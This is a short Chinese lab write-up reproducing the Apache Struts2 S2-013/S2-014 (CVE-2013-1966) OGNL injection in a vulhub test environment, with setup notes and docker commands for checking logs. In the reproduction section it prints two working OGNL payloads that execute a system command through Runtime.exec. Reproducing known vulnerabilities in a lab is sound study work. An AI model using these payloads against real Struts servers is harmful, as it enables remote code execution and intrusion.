CVE-2013-1966 S2-013/014复现

0X00-引言

---

回家喽，养猪去喽，学了半年的母猪产后护理终于可以实现喽😛

0X01-环境搭建

---

靶机：CentOS Linux 7

攻击机：windows server 2016 && Kail

环境：vulhub

项目地址：https://github.com/vulhub/vulhub

搭建vulhub请访问：空白centos7 64 搭建vulhub(详细)

0X02-漏洞描述

---

Struts2 标签中<s:a>和<s:url>都包含一个 includeParams 属性，其值可以为 none，get 或 set all，参考官方对应的含义如下：

1. none - 链接不包含请求的任意参数值（默认）
2. get - 链接只包含 GET 请求中的参数和其值
3. 全部 - 链接包含 GET 和 POST 所有参数和其价值

<s:a>支持显示一个链接，当includeParams=all的时候，参数超本次的GET和POST都采用URL的参数上。

S2-014 是对 S2-013 修复的加强，在 S2-013 修复的代码中疏忽了 ${ognl_exp} OGNL 表达式执行的，因此 S2-014 是他的修复方式。

影响版本：2.0.0 - 2.3.14.1

漏洞详情：

• http://struts.apache.org/docs/s2-013.html
• http://struts.apache.org/docs/s2-014.html

0X03-漏洞复现

---

01-任意命令执行

poc

${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}
// 或
${#_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}

注意url编码

进入环境点击

抓包-修改

0X04-漏洞分析

---

略，暂时看不懂源码以后会补充

0X05-查看日志

---

docker ps #查看容器ID
docker exec -it ID /bin/bash #进入
cd logs #进入日志目录
cat localhost_access_log.2021-12-02.txt #查看日志
exit #退出容器

日志中会记录攻击手法

0X06-参考

---

S2-013/S2-014 远程代码执行漏洞